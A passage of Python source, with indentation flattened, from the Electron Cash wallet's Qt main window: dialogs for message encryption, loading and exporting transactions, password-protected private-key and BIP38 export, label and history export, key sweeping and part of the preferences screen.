b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
return PasswordDialog(parent, msg).run()
def tx_from_text(self, txt):
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx, sign_schnorr=self.wallet.is_schnorr_enabled())
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
# Due to the asynchronous nature of the qr reader we need to keep the
# dialog instance as member variable to prevent reentrancy/multiple ones
# from being presented at once.
_qr_dialog = None
def read_tx_from_qrcode(self):
if self._qr_dialog:
# Re-entrancy prevention -- there is some lag between when the user
# taps the QR button and the modal dialog appears. We want to
# prevent multiple instances of the dialog from appearing, so we
# must do this.
self.print_error("Warning: QR dialog is already presented, ignoring.")
return
if self.gui_object.warn_if_cant_import_qrreader(self):
return
from electroncash import get_config
from .qrreader import QrReaderCameraDialog
data = ''
self._qr_dialog = None
try:
self._qr_dialog = QrReaderCameraDialog(parent=self.top_level_window())
def _on_qr_reader_finished(success: bool, error: str, result):
if self._qr_dialog:
self._qr_dialog.deleteLater(); self._qr_dialog = None
if not success:
if error:
self.show_error(error)
return
if not result:
return
# if the user scanned a bitcoincash URI
if result.lower().startswith(networks.net.CASHADDR_PREFIX + ':') or result.lower().startswith(networks.net.SLPADDR_PREFIX + ':'):
self.pay_to_URI(result)
return
# else if the user scanned an offline signed tx
try:
result = bh2u(bitcoin.base_decode(result, length=None, base=43))
tx = self.tx_from_text(result) # will show an error dialog on error
if not tx:
return
except BaseException as e:
self.show_error(str(e))
return
self.show_transaction(tx)
self._qr_dialog.qr_finished.connect(_on_qr_reader_finished)
self._qr_dialog.start_scan(get_config().get_video_device())
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self._qr_dialog = None
self.show_error(str(e))
def read_tx_from_file(self, *, fileName = None):
fileName = fileName or self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r", encoding='utf-8') as f:
file_content = f.read()
file_content = file_content.strip()
tx_file_dict = json.loads(str(file_content))
except (ValueError, IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self.top_level_window(), _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self, *, fileName = None):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file(fileName=fileName)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self, *, txid=None, parent=None):
parent = parent or self
if self.gui_object.warn_if_no_network(parent):
return
from electroncash import transaction
ok = txid is not None
if not ok:
txid, ok = QInputDialog.getText(parent, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
ok, r = self.network.get_raw_tx_for_txid(txid, timeout=10.0)
if not ok:
parent.show_message(_("Error retrieving transaction") + ":\n" + r)
return
tx = transaction.Transaction(r, sign_schnorr=self.wallet.is_schnorr_enabled()) # note that presumably the tx is already signed if it comes from blockchain so this sign_schnorr parameter is superfluous, but here to satisfy my OCD -Calin
self.show_transaction(tx)
def export_bip38_dialog(self):
''' Convenience method. Simply calls self.export_privkeys_dialog(bip38=True) '''
self.export_privkeys_dialog(bip38 = True)
@protected
def export_privkeys_dialog(self, password, *, bip38=False):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
if bip38:
self.show_error(_('WARNING: This is a multi-signature wallet.') + '\n' +
_("It cannot be used with BIP38 encrypted keys."))
return
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
if bip38:
if not bitcoin.Bip38Key.canEncrypt() or not bitcoin.Bip38Key.isFast():
self.show_error(_("BIP38 Encryption is not available. Please install 'pycryptodomex' and restart Electron Cash to enable BIP38."))
return
passphrase = self.get_passphrase_dialog(
msg = (
_("You are exporting your wallet's private keys as BIP38 encrypted keys.") + "\n\n" +
_("You must specify a passphrase to use for encryption.") + "\n" +
_("Save this passphrase so you may decrypt your BIP38 keys later.")
)
)
if not passphrase:
# user cancel
return
bip38 = passphrase # overwrite arg with passphrase.. for use down below ;)
class MyWindowModalDialog(WindowModalDialog):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
d = MyWindowModalDialog(self.top_level_window(), _('Private keys'))
weak_d = Weak.ref(d)
d.setObjectName('WindowModalDialog - Private Key Export')
destroyed_print_error(d) # track object lifecycle
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
lines = [ _("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.") ]
if bip38:
del lines[0] # No need to scream-WARN them since BIP38 *are* encrypted
msg = '\n'.join(lines)
vbox.addWidget(QLabel(msg))
if bip38:
wwlbl = WWLabel()
def set_ww_txt(pf_shown=False):
if pf_shown:
pf_text = ( ("<font face='{monoface}' size=+1><b>".format(monoface=MONOSPACE_FONT))
+ bip38
+ ('</b></font> <a href="hide">{link}</a>'.format(link=_("Hide"))) )
else:
pf_text = '<a href="show">{link}</a>'.format(link=_("Click to show"))
wwlbl.setText(
_("The below keys are BIP38 <i>encrypted</i> using the passphrase: {passphrase}<br>"
"Please <i>write this passphrase down</i> and store it in a secret place, separate from these encrypted keys."
).format(passphrase=pf_text)
)
def toggle_ww_txt(link):
set_ww_txt(link=="show")
set_ww_txt()
wwlbl.linkActivated.connect(toggle_ww_txt)
vbox.addWidget(wwlbl)
e = QTextEdit()
e.setFont(QFont(MONOSPACE_FONT))
e.setWordWrapMode(QTextOption.NoWrap)
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv' if not bip38 else 'electron-cash-bip38-keys.csv'
select_msg = _('Select file to export your private keys to')
box, filename_e, csv_button = filename_field(self.config, defaultname, select_msg)
vbox.addSpacing(12)
vbox.addWidget(box)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
stop = False
def privkeys_thread():
for addr in addresses:
if not bip38:
# This artificial sleep is likely a security / paranoia measure
# to allow user to cancel or to make the process "feel expensive".
# In the bip38 case it's already slow enough so this delay
# is not needed.
time.sleep(0.100)
if stop:
return
try:
privkey = self.wallet.export_private_key(addr, password)
if bip38 and privkey:
privkey = str(bitcoin.Bip38Key.encrypt(privkey, bip38)) # __str__() -> base58 encoded bip38 key
except InvalidPassword:
# See #921 -- possibly a corrupted wallet or other strangeness
privkey = 'INVALID_PASSWORD'
if self.is_slp_wallet: #TODO: also create special prefix for SLP wallet private keys
private_keys[addr.to_full_string(Address.FMT_SLPADDR)] = privkey
else:
private_keys[addr.to_full_string(Address.FMT_CASHADDR)] = privkey
strong_d = weak_d()
try:
if strong_d and not stop:
strong_d.computing_privkeys_signal.emit()
else:
return
finally:
del strong_d
if stop:
return
strong_d = weak_d()
if strong_d:
strong_d.show_privkeys_signal.emit()
def show_privkeys():
nonlocal stop
if stop:
return
s = "\n".join('{:45} {}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
stop = True
thr = None
def on_dialog_closed(*args):
nonlocal stop
stop = True
try: d.computing_privkeys_signal.disconnect()
except TypeError: pass
try: d.show_privkeys_signal.disconnect()
except TypeError: pass
try: d.finished.disconnect()
except TypeError: pass
if thr and thr.is_alive():
thr.join(timeout=1.0) # wait for thread to end for maximal GC mojo
def computing_privkeys_slot():
if stop:
return
e.setText(_("Please wait... {num}/{total}").format(num=len(private_keys),total=len(addresses)))
d.computing_privkeys_signal.connect(computing_privkeys_slot)
d.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
thr = threading.Thread(target=privkeys_thread, daemon=True)
thr.start()
res = d.exec_()
if not res:
stop = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+", encoding='utf-8') as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
data = f.read()
data = json.loads(data)
if type(data) is not dict or not len(data) or not all(type(v) is str and type(k) is str for k,v in data.items()):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in data.items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.utxo_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
with open(fileName, 'w+', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self.top_level_window(), _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
box, filename_e, csv_button = filename_field(self.config, defaultname, select_msg)
vbox.addWidget(box)
include_addresses_chk = QCheckBox(_("Include addresses"))
include_addresses_chk.setChecked(True)
include_addresses_chk.setToolTip(_("Include input and output addresses in history export"))
vbox.addWidget(include_addresses_chk)
fee_dl_chk = QCheckBox(_("Fetch accurate fees from network (slower)"))
fee_dl_chk.setChecked(self.is_fetch_input_data())
fee_dl_chk.setEnabled(bool(self.wallet.network))
fee_dl_chk.setToolTip(_("If this is checked, accurate fee and input value data will be retrieved from the network"))
vbox.addWidget(fee_dl_chk)
fee_time_w = QWidget()
fee_time_w.setToolTip(_("The amount of overall time in seconds to allow for downloading fee data before giving up"))
hbox = QHBoxLayout(fee_time_w)
hbox.setContentsMargins(20, 0, 0, 0)
hbox.addWidget(QLabel(_("Timeout:")), 0, Qt.AlignRight)
fee_time_sb = QSpinBox()
fee_time_sb.setMinimum(10)
fee_time_sb.setMaximum(9999)
fee_time_sb.setSuffix(" " + _("seconds"))
fee_time_sb.setValue(30)
fee_dl_chk.clicked.connect(fee_time_w.setEnabled)
fee_time_w.setEnabled(fee_dl_chk.isChecked())
hbox.addWidget(fee_time_sb, 0, Qt.AlignLeft)
hbox.addStretch(1)
vbox.addWidget(fee_time_w)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
return
filename = filename_e.text()
if not filename:
return
success = False
try:
# minimum 10s time for calc. fees, etc
timeout = max(fee_time_sb.value() if fee_dl_chk.isChecked() else 10.0, 10.0)
success = self.do_export_history(filename, csv_button.isChecked(),
download_inputs=fee_dl_chk.isChecked(),
timeout=timeout,
include_addresses=include_addresses_chk.isChecked())
except Exception as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
else:
if success:
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def is_fetch_input_data(self):
''' default on if network.auto_connect is True, otherwise use config value '''
return bool(self.wallet and self.wallet.network and self.config.get('fetch_input_data', self.wallet.network.auto_connect))
def set_fetch_input_data(self, b):
self.config.set_key('fetch_input_data', bool(b))
def do_export_history(self, fileName, is_csv, *, download_inputs=False, timeout=30.0, include_addresses=True):
wallet = self.wallet
if not wallet:
return
dlg = None # this will be set at the bottom of this function
def task():
def update_prog(x):
if dlg: dlg.update_progress(int(x*100))
return wallet.export_history(fx=self.fx,
show_addresses=include_addresses,
decimal_point=self.decimal_point,
fee_calc_timeout=timeout,
download_inputs=download_inputs,
progress_callback=update_prog)
success = False
def on_success(history):
nonlocal success
ccy = (self.fx and self.fx.get_currency()) or ''
has_fiat_columns = history and self.fx and self.fx.show_history() and 'fiat_value' in history[0] and 'fiat_balance' in history[0] and 'fiat_fee' in history[0]
lines = []
for item in history:
if is_csv:
cols = [item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['fee'], item['date']]
if has_fiat_columns:
cols += [item['fiat_value'], item['fiat_balance'], item['fiat_fee']]
if include_addresses:
inaddrs_filtered = (x for x in (item.get('input_addresses') or [])
if Address.is_valid(x))
outaddrs_filtered = (x for x in (item.get('output_addresses') or [])
if Address.is_valid(x))
cols.append( ','.join(inaddrs_filtered) )
cols.append( ','.join(outaddrs_filtered) )
lines.append(cols)
else:
if has_fiat_columns and ccy:
item['fiat_currency'] = ccy # add the currency to each entry in the json. this wastes space but json is bloated anyway so this won't hurt too much, we hope
elif not has_fiat_columns:
# No need to include these fields as they will always be 'No Data'
item.pop('fiat_value', None)
item.pop('fiat_balance', None)
item.pop('fiat_fee', None)
lines.append(item)
with open(fileName, "w+", encoding="utf-8") as f: # ensure encoding to utf-8. Avoid Windows cp1252. See #1453.
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
cols = ["transaction_hash","label", "confirmations", "value", "fee", "timestamp"]
if has_fiat_columns:
cols += [f"fiat_value_{ccy}", f"fiat_balance_{ccy}", f"fiat_fee_{ccy}"] # in CSV mode, we use column names eg fiat_value_USD, etc
if include_addresses:
cols += ["input_addresses", "output_addresses"]
transaction.writerow(cols)
for line in lines:
transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
success = True
# kick off the waiting dialog to do all of the above
dlg = WaitingDialog(self.top_level_window(),
_("Exporting history, please wait ..."),
task, on_success, self.on_error, disable_escape_key=True,
auto_exec=False, auto_show=False, progress_bar=True, progress_min=0, progress_max=100)
dlg.exec_()
# this will block heere in the WaitingDialog event loop... and set success to True if success
return success
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self.top_level_window(), title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
bip38_warn_label = QLabel(_("<b>BIP38 support is disabled because a requisite library is not installed.</b> Please install 'cryptodomex' or omit BIP38 private keys (private keys starting in 6P...). Decrypt keys to WIF format (starting with 5, K, or L) in order to sweep."))
bip38_warn_label.setWordWrap(True)
bip38_warn_label.setHidden(True)
vbox.addWidget(bip38_warn_label)
extra = ""
if bitcoin.is_bip38_available():
extra += " " + _('or BIP38 keys')
vbox.addWidget(QLabel(_("Enter private keys") + extra + " :"))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText(), allow_bip38=True)
def has_bip38_keys_but_no_bip38():
if bitcoin.is_bip38_available():
return False
keys = [k for k in keys_e.toPlainText().split() if k]
return any(bitcoin.is_bip38_key(k) for k in keys)
def enable_sweep():
bad_bip38 = has_bip38_keys_but_no_bip38()
sweepok = bool(get_address_text() and not bad_bip38 and get_priv_keys())
sweep_button.setEnabled(sweepok)
bip38_warn_label.setHidden(not bad_bip38)
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
res = d.exec_()
d.setParent(None)
if not res:
return
try:
self.do_clear()
keys = get_priv_keys()
bip38s = {}
for i, k in enumerate(keys):
if bitcoin.is_bip38_key(k):
bip38s[k] = i
if bip38s:
# For all the BIP38s detected, prompt for password
from .bip38_importer import Bip38Importer
d2 = Bip38Importer(bip38s.keys(), parent=self.top_level_window())
d2.exec_()
d2.setParent(None)
if d2.decoded_keys:
for k,tup in d2.decoded_keys.items():
wif, adr = tup
# rewrite the keys they specified with the decrypted WIF in the keys list for sweep_preparations to work below...
i = bip38s[k]
keys[i] = wif
else:
self.show_message(_("User cancelled"))
return
coins, keypairs = sweep_preparations(keys, self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self.top_level_window(), title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad, bad_info = [], []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
bad_info.append("{}: {}".format(key, str(e)))
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_warning(_("The following could not be imported") + ':\n' + '\n'.join(bad), detail_text='\n\n'.join(bad_info))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
if bitcoin.is_bip38_available():
msg += " " + _('or BIP38 keys')
def func(key):
if bitcoin.is_bip38_available() and bitcoin.is_bip38_key(key):
from .bip38_importer import Bip38Importer
d = Bip38Importer([key], parent=self.top_level_window(),
message = _('A BIP38 key was specified, please enter a password to decrypt it'),
show_count = False)
d.exec_()
d.setParent(None) # python GC quicker if this happens
if d.decoded_keys:
wif, adr = d.decoded_keys[key]
return self.wallet.import_private_key(wif, password)
else:
raise util.UserCancelled()
else:
return self.wallet.import_private_key(key, password)
self._do_import(title, msg, func)
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
if not self.amount_e.isVisible():
self.fiat_send_e.setVisible(False)
else:
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def cashaddr_icon(self):
if self.config.get('addr_format', 0) == 1:
return QIcon(":icons/tab_converter.svg")
elif self.config.get('addr_format', 0)==2:
return QIcon(":icons/tab_converter_slp.svg")
else:
return QIcon(":icons/tab_converter_bw.svg")
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
def toggle_cashaddr_status_bar(self):
self.toggle_cashaddr(self.config.get('addr_format', 2))
def toggle_cashaddr_settings(self,state):
self.toggle_cashaddr(state, True)
def toggle_cashaddr(self, format, specified = False):
#Gui toggle should just increment, if "specified" is True it is being set from preferences, so leave the value as is.
if specified==False:
if self.is_slp_wallet:
max_format=2
else:
max_format=1
format+=1
if format > max_format:
format=0
self.config.set_key('addr_format', format)
Address.show_cashaddr(format)
self.setAddrFormatText(format)
for window in self.gui_object.windows:
window.cashaddr_toggled_signal.emit()
def setAddrFormatText(self, format):
try:
if format == 0:
self.addr_format_label.setText("Addr Format: Legacy")
elif format == 1:
self.addr_format_label.setText("Addr Format: Cash")
else:
self.addr_format_label.setText("Addr Format: SLP")
except AttributeError:
pass
def settings_dialog(self):
class SettingsModalDialog(WindowModalDialog):
shown_signal = pyqtSignal()
def showEvent(self, e):
super().showEvent(e)
self.shown_signal.emit()
self.need_restart = False
dialog_finished = False
d = SettingsModalDialog(self.top_level_window(), _('Preferences'))
d.setObjectName('WindowModalDialog - Preferences')
destroyed_print_error(d)
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
misc_widgets = []
global_tx_widgets, per_wallet_tx_widgets = [], []
addr_format_choices = ["Legacy Format","CashAddr Format","SLP Format"]
addr_format_dict={'Legacy Format':0,'CashAddr Format':1,'SLP Format':2}
msg = _('Choose which format the wallet displays for Bitcoin Cash addresses')
addr_format_label = HelpLabel(_('Address Format') + ':', msg)
addr_format_combo = QComboBox()
addr_format_combo.addItems(addr_format_choices)
addr_format_combo.setCurrentIndex(self.config.get("addr_format", 0))
addr_format_combo.currentIndexChanged.connect(self.toggle_cashaddr_settings)
gui_widgets.append((addr_format_label,addr_format_combo))
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages, get_system_language_match, match_language
language_names = []
language_keys = []
for (lang_code, lang_def) in languages.items():
language_keys.append(lang_code)
lang_name = []
lang_name.append(lang_def.name)
if lang_code == '':
# System entry in languages list (==''), gets system setting
sys_lang = get_system_language_match()
if sys_lang:
lang_name.append(f' [{languages[sys_lang].name}]')
language_names.append(''.join(lang_name))
lang_combo.addItems(language_names)
conf_lang = self.config.get("language", '')
if conf_lang:
# The below code allows us to rename languages in saved config and
# have them still line up with languages in our languages dict.
# For example we used to save English as en_UK but now it's en_US
# and it will still match
conf_lang = match_language(conf_lang)
try: index = language_keys.index(conf_lang)
except ValueError: index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.update_tabs()
self.update_status()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
if self.fee_custom_lbl.text() == '':
self.fee_slider_mogrifier(self.get_custom_fee_text())
else:
self.fee_slider_mogrifier()
fee_gb = QGroupBox(_('Fees'))
fee_lo = QGridLayout(fee_gb)
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom fee rate:'), _('Custom Fee Rate in Satoshis per byte'))
fee_lo.addWidget(customfee_label, 0, 0, 1, 1, Qt.AlignRight)
fee_lo.addWidget(customfee_e, 0, 1, 1, 1, Qt.AlignLeft)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_lo.addWidget(feebox_cb, 1, 0, 1, 2, Qt.AlignJustify)
# Fees box up top
misc_widgets.append((fee_gb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link/']) + '\n\n'\
+ _('For more information, see http://openalias.org')
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_gb = QGroupBox(_("Identity"))
id_form = QFormLayout(id_gb)
id_form.addRow(alias_label, alias_e)
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_form.addRow(SSL_id_label, SSL_id_e)
# Identity box in middle of this tab
misc_widgets.append((id_gb, None)) # commit id_form/id_gb to master layout via this data structure
from . import exception_window as ew
cr_gb = QGroupBox(_("Crash Reporter"))
cr_grid = QGridLayout(cr_gb)
cr_chk = QCheckBox()
cr_chk.setChecked(ew.is_enabled(self.config))
cr_chk.clicked.connect(lambda b: ew.set_enabled(self.config, b))
cr_help = HelpLabel(_("Crash reporter enabled"),
_("The crash reporter is the error window which pops-up when Electron Cash encounters an internal error.\n\n"
"It is recommended that you leave this option enabled, so that developers can be notified of any internal bugs. "
"When a crash is encountered you are asked if you would like to send a report.\n\n"
"Private information is never revealed in crash reports to developers."))
# The below dance ensures the checkbox is horizontally centered in the widget
cr_grid.addWidget(QWidget(), 0, 0, 1, 1) # dummy spacer
cr_grid.addWidget(cr_chk, 0, 1, 1, 1, Qt.AlignRight)
